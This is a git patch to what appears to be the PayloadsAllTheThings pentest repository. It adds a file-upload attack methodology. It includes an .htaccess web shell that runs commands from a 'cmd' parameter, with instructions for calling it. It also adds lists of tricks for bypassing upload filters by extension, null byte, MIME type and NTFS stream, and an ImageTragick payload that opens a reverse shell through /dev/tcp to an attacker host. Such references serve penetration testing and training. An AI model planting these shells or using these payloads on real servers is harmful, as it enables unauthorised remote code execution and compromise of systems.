From 21f2b5dca6b463379a83b1bcd91bad436da6852e Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 27 Sep 2020 11:16:50 +0200
Subject: [PATCH] Upload Methodology

---
 CONTRIBUTING.md                               |  2 +-
 .../.htaccess_phpinfo                         |  5 ++
 .../.htaccess_shell                           | 23 +++++
 Upload Insecure Files/README.md               | 90 ++++++++++++-------
 4 files changed, 88 insertions(+), 32 deletions(-)
 create mode 100644 Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo
 create mode 100644 Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 957f1e6..68acff5 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,6 +1,6 @@
 # CONTRIBUTING
 
-PayloadAllTheThings's Team :heart: pull requests :)
+PayloadsAllTheThings' Team :heart: pull requests :)
 Feel free to improve with your payloads and techniques !
 
 You can also contribute with a :beers: IRL, or using the sponsor button.
diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo
new file mode 100644
index 0000000..97be883
--- /dev/null
+++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo	
@@ -0,0 +1,5 @@
+AddType application/x-httpd-php .htaccess
+# <?php phpinfo(); ?>
+SetHandler server-status
+SetHandler server-info
+
diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell
new file mode 100644
index 0000000..0b3b068
--- /dev/null
+++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell	
@@ -0,0 +1,23 @@
+# htaccess backdoor shell
+# this is relatively stealthy compared to a typical webshell
+
+# overriding deny rule
+# making htaccess accessible from the internet
+# without this you'll get a HTTP 403
+<Files ~ "^\.ht">
+Require all granted
+Order allow,deny
+Allow from all
+</Files>
+
+# Make the server treat .htaccess file as .php file
+AddType application/x-httpd-php .htaccess
+
+# <?php system($_GET['cmd']); ?>
+
+# To execute commands you would navigate to:
+# http://vulnerable.com/.htaccess?cmd=YourCommand
+
+# If system(); isnt working then try other syscalls
+# e.g. passthru(); shell_exec(); etc
+# If you still cant execute syscalls, try bypassing php.ini via htaccess
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 1ffa55c..2e692e7 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -12,48 +12,58 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
     * [Picture upload with LFI](#picture-upload-with-lfi)
     * [Configuration Files](#configuration-files)
     * [CVE - Image Tragik](#cve---image-tragik)
+    * [ZIP Archive](#zip-archive)
 * [References](#references)
 
 
 ## Tools
 - [Fuxploider](https://github.com/almandin/fuxploider)
+- [Burp> Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
 
 ## Exploits
 
 ### PHP Extension
 
-```powershell
-.php
-.php3
-.php4
-.php5
-.php7
-
-Less known extensions
-.pht
-.phar
-.phpt
-.pgif
-.phtml
-.phtm
-
-Double extensions
-.jpeg.php
-.jpg.php
-.png.php
-```
+* Default PHP extensions
+    ```powershell
+    .php
+    .php3
+    .php4
+    .php5
+    .php7
+    ```
+* Less known extensions
+    ```powershell
+    .pht
+    .phps
+    .phar
+    .phpt
+    .pgif
+    .phtml
+    .phtm
+    .inc
+    ```
+* Double extensions
+    ```powershell
+    .jpeg.php
+    .jpg.php
+    .png.php
+    .*.php
+    ```
 
 ### Other extensions
 
-```powershell
-asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
-perl: .pl, .pm, .cgi, .lib
-jsp : .jsp, .jspx, .jsw, .jsv, .jspf
-Coldfusion: .cfm, .cfml, .cfc, .dbm
-```
+* asp : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
+* perl: `.pl, .pm, .cgi, .lib`
+* jsp : `.jsp, .jspx, .jsw, .jsv, .jspf`
+* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
 
 ### Upload tricks
 
+- Use double extensions : `.jpg.php`
+- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
+- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+
 - Null byte (works well against `pathinfo()`)
     * .php%00.gif
     * .php\x00.gif
@@ -61,13 +71,16 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
     * .php\x00.png
     * .php%00.jpg
     * .php\x00.jpg
+- Special characters
+    * file.php...... (In Windows when a file is created with dots at the end those will be removed)
+    * file.php%20
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
     * `Content-Type : image/gif`
     * `Content-Type : image/png`
     * `Content-Type : image/jpeg`
 - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
-    
-    Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
+    * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
+- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")
 
 ### Picture upload with LFI
 
@@ -78,6 +91,10 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
 
 ### Configuration Files
 
+If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
+If you are  trying to upload files to an ASP server, take a look at the .config trick to execute code.
+
+Configuration files examples
 - .htaccess
 - web.config
 - httpd.conf
@@ -86,12 +103,23 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
 
 ### CVE - Image Tragik
 
+Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+
 ```powershell
-HTTP Request
-Reverse Shell
-Touch command
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
+pop graphic-context
 ```
 
+More payload in the folder `Picture Image Magik`
+
+### ZIP archive
+
+When a ZIP/archive file is automatically decompressed after the upload
+
+* Zip Slip: directory traversal to write a file somewhere else
+
 ## References
 
 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil